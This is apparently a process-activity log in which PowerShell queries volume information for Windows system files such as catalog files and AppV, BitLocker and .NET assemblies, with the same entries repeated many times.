Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
